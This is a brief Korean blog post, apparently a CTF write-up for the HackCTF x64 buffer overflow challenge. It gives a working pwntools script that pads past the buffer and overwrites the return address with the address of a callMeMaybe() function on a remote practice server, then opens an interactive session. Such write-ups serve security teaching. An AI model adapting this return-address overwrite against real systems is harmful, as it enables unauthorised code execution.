x64 buffer overflow
bof로 ret자리에 callmemaybe()함수 주소를 넣어주면 될까요
-callMeMaybe 함수 주소
-offset
-pwntools 코드
#-*-coding:utf-8-*- from pwn import * p=remote('ctf.j0n9hyun.xyz',3004) payload='a'*(0x110+8) payload+=p64(0x0000000000400606) p.sendline(payload) p.interactive() |
'Hacking > write-up' 카테고리의 다른 글
(HackCTF) x64 Simple_size_BOF (0) | 2020.09.06 |
---|---|
(HackCTF) Simple_Overflow_ver_2 (0) | 2020.09.06 |
(HackCT)yes_or_no (0) | 2020.09.04 |
(HackCTF)bof_pie (0) | 2020.09.03 |
(HackCTF)offset (0) | 2020.09.03 |